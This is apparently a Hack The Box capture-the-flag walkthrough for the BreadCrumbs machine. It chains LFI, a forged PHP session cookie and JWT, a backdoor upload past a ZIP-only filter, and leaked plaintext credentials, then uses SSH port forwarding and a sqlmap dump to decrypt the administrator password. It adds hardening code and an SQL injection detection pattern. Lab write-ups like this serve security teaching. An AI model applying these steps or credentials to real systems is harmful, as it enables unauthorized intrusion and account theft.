
Hackthebox BreadCrumbs walkthrough

1

Methodology

  • Enumeration by LFI
  • Phpsessid and Jwt token forge
  • unrestricted upload
  • Database leak
  • Binary file analysis
  • Port forwarding
  • Database dump with SQLMAP

┌──(root💀m19o)-[~/HTB/Breadcrumbs]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.228
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
445/tcp open microsoft-ds?
3306/tcp open mysql?
5040/tcp open unknown
7680/tcp open pando-pub?
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=2/23%Time=6034FA27%P=x86_64-pc-linux-gnu%r(RP
SF:CCheck,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.12'\x20is\x20not\x20a
SF:llowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(X11Probe
SF:,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.12'\x20is\x20not\x20allowed
SF:\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeration


2

As a penetartion tester you should analyze the application to understand the functionality of it

So now let's check what that button does.

From that page we can understand that the application is for reading books, and that button searches for books by title and author name.

Let's see how the application searches for books.

So I started testing the search with a random word; in my case I used "test" to understand the behavior.

I got nothing from that, so I will start my proxy, Burp Suite, to intercept that request.

After intercepting the request, as you can see, there is another parameter called "method" that we couldn't see before. Now let's change the method value to 1.

I managed to generate an error by changing the method value to 1.

The first error line says there is a missing key in the array called book, and the second says that file_get_contents can't find the file. So what if we gave it a file to open?

[screenshot: paul]

So now we have LFI. Files.php says that we need paul's session to log in.

Let's see how this application generates a cookie.

So now we have the code that generates the cookie; let's get paul's cookie.

<?php
$username = "paul";
$max = 3;
$seed = rand(0, $max);   // never used: the foreach below reassigns $seed on every iteration
foreach (range(0, $max) as $seed) {
    $key = "s4lTy_stR1nG_" . $username[$seed] . "(!528./9890";   // static salt + one character of the username
    $session_cookie = $username . md5($key);                      // username prefix + md5, so the cookie is fully predictable
}
echo $session_cookie;   // the value from the last iteration (seed 3) is the one printed

Output:
paul47200b180ccd6835d25d034eeb6e6390
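To make the weakness concrete, here is an added example (Python written for this walkthrough, not the box's PHP) that reproduces the scheme, enumerates every cookie it can ever issue for a user, and contrasts it with a random server-side session id; the store and function names are my own.

```python
import hashlib
import secrets

# Python rendering of the page's cookie scheme (constructed for comparison;
# not the box's PHP). The cookie is username + md5(static prefix + one
# character of the username + static suffix), so anyone who can read the
# source can compute it for any user.
SALT_PREFIX = "s4lTy_stR1nG_"
SALT_SUFFIX = "(!528./9890"


def weak_session_cookie(username: str, seed: int) -> str:
    key = SALT_PREFIX + username[seed] + SALT_SUFFIX
    return username + hashlib.md5(key.encode()).hexdigest()


def weak_cookie_space(username: str, max_seed: int = 3) -> set:
    """Every cookie value the scheme can ever hand out for this user.

    rand(0, $max) picks one of max_seed + 1 characters, and repeated
    characters collapse further, so the keyspace is at most 4 values
    (and the page's loop always ends on seed 3 anyway)."""
    return {weak_session_cookie(username, s) for s in range(max_seed + 1)}


# Hardened replacement (my own, not from the box): the cookie carries no
# information about the user and comes from the OS CSPRNG; the username is
# looked up server-side instead of being embedded in the cookie.
SESSION_STORE: dict = {}


def issue_session(username: str) -> str:
    cookie = secrets.token_hex(32)  # 256 bits of entropy, 64 hex chars
    SESSION_STORE[cookie] = username
    return cookie


def resolve_session(cookie: str):
    return SESSION_STORE.get(cookie)
```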

Now we have our cookie.

Let's change it and log in.

[screenshot: admin-login]

Now we have access.

Let's check all the tabs and see what we can get.

[screenshot: upload]

So I can upload now! Let's check how it works.

[screenshot: token]

It says a key called token is missing, so I need to generate a token. Let's see how we can get one.

[screenshot: Login-php]

As you can see, login.php uses authController.php to validate the login; now let's see the content of authController.php.

Now I can generate our token.

To generate a token we need a payload and a secret key, as mentioned; our payload is a multidimensional array: { "data": { "username": "paul" } }

$secret_key = '6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e';

Token = eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU

[screenshot: generate-token]

Let's upload the backdoor.

It accepts ZIP files only, so upload a zip file, replace its content with the PHP backdoor, and change the type to PHP in the filename and at the end of the request too.

[screenshot: backdoor]

Bingo

Foothold

Let's start enumeration from the inside. The upload dir is "Portal/Uploads"; you will find your backdoor there.

[screenshot: enumeration]

There is an interesting folder named pizzaDeliveryUserData; let's check it.

[screenshot: users]

That's juicy: all users' data, but it looks like only one user is enabled, and that user is juliette. Let's check that file.

[screenshot: juliette]

Got creds now!!

[screenshot: creds]

User Flag

[screenshot: user flag]

Let's continue enumeration.

[screenshot: user]

Microsoft Sticky Notes contains juicy info; let's check it.

[screenshot: sqlite]

These are database files; we need to open them on our machine to check them.

You can download the files in more than one way; use whatever you like.

In my case I used SCP to get the files.

Usage (pull a file from the target to your machine):

scp user@<target ip>:"<path of the file you want to download>" "<where you want it on your machine>"

Lateral Movement

After downloading the files, look what I got!

juliette: jUli901./())!
development: fN3)sN5Ee@g
administrator: [MOVED]

[screenshot: sqlite]

Lateral Movement DONE

[screenshot: lateral]

Privilege Escalation

What is the Development user for?

[screenshot: krypter-linux]

I tried running ./Krypter_linux and that's what it gave me.

[screenshot: Admin-PASS]

That looks like a SQL statement; we need SQLMAP NOW!!

PS C:\Development> curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords' -UseBasicParsing


StatusCode : 200
StatusDescription : OK
Content : selectarray(1) {
[0]=>
array(1) {
["aes_key"]=>
string(16) "k19D193j.<19391("
}
}

RawContent : HTTP/1.1 200 OK
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 96
Content-Type: text/html; charset=UTF-8
Date: Tue, 23 Feb 2021 19:24:09 GMT
Server: Apache/2.4.46 (Win64) ...
Forms :
Headers : {[Keep-Alive, timeout=5, max=100], [Connection, Keep-Alive], [Content-Length, 96], [Content-Type,
text/html; charset=UTF-8]...}
Images : {}
InputFields : {}
Links : {}
ParsedHtml :
RawContentLength : 96

To use SQLMAP we need to use port forwarding

In my case i used SSH

ssh -N -L 1234:127.0.0.1:1234 development@10.10.10.228

┌──(root💀kali)-[~/HTB/Breadcrumbs]
└─# curl 'http://127.0.0.1:1234/index.php?method=select&username=administrator&table=passwords'
selectarray(1) {
[0]=>
array(1) {
["aes_key"]=>
string(16) "k19D193j.<19391("
}
}

Let's ROLL

sqlmap -u http://127.0.0.1:1234/index.php\?method\=select\&username\=administrator\&table\=passwords --dump

Database: bread
Table: passwords
[1 entry]
+----+---------------+------------------+----------------------------------------------+
| id | account | aes_key | password |
+----+---------------+------------------+----------------------------------------------+
| 1 | Administrator | k19D193j.<19391( | H2dFz/jNwtSTWDURot9JBhWMP6XOdmcpgqvYHG35QKw= |
+----+---------------+------------------+----------------------------------------------+
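The dump shows the local service splicing the request's username and table parameters into its query. As an added, constructed example (not the box's index.php; the in-memory table and its values are placeholders), here is that pattern beside a hardened handler that allowlists the table name and binds the username, plus a cheap log-side check for the kind of values sqlmap sends:

```python
import sqlite3

# Constructed stand-in for the local "bread" database behind 127.0.0.1:1234.
# Column layout follows the sqlmap dump above; the values are placeholders.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE passwords (id INTEGER PRIMARY KEY, account TEXT, "
                 "aes_key TEXT, password TEXT)")
    conn.execute("INSERT INTO passwords VALUES (1, 'Administrator', "
                 "'PLACEHOLDER_AES_KEY', 'PLACEHOLDER_B64_CIPHERTEXT')")
    conn.commit()
    return conn


def select_vulnerable(conn: sqlite3.Connection, username: str, table: str) -> list:
    # The pattern the dump implies: both request parameters spliced straight into SQL text.
    sql = f"SELECT aes_key FROM {table} WHERE account = '{username}' COLLATE NOCASE"
    return [row[0] for row in conn.execute(sql)]


# Table names cannot be bound as parameters, so they are checked against a fixed
# allowlist; the username is bound, so quotes in it are data, not syntax.
ALLOWED_TABLES = {"passwords"}


def select_hardened(conn: sqlite3.Connection, username: str, table: str) -> list:
    if table not in ALLOWED_TABLES:
        raise ValueError(f"table not permitted: {table!r}")
    sql = f"SELECT aes_key FROM {table} WHERE account = ? COLLATE NOCASE"
    return [row[0] for row in conn.execute(sql, (username,))]


def suspicious_param(value: str) -> bool:
    """Log-side check: quotes, comment markers or SQL keywords have no business
    in a field that should only ever hold a plain account name."""
    v = value.lower()
    markers = ("'", '"', "--", "/*", " or ", " and ", "union", "sleep(")
    return any(m in v for m in markers)
```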

Now we need to decrypt the password.

Base64-decode it first, then AES-decrypt it with the aes_key we got (the CyberChef recipe below treats the 16-byte key as Latin1 and uses AES-CBC with an all-zero IV).

You can use this link to decrypt it:

https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',false)AES_Decrypt(%7B'option':'Latin1','string':'k19D193j.%3C19391('%7D,%7B'option':'Hex','string':'0000000000000000000000000000000'%7D,'CBC','Raw','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':'undefined'%7D)&input=SDJkRnovak53dFNUV0RVUm90OUpCaFdNUDZYT2RtY3BncXZZSEczNVFLdz0

ROOT Flag

[screenshot: root flag]

This post is licensed under CC BY 4.0 by the author.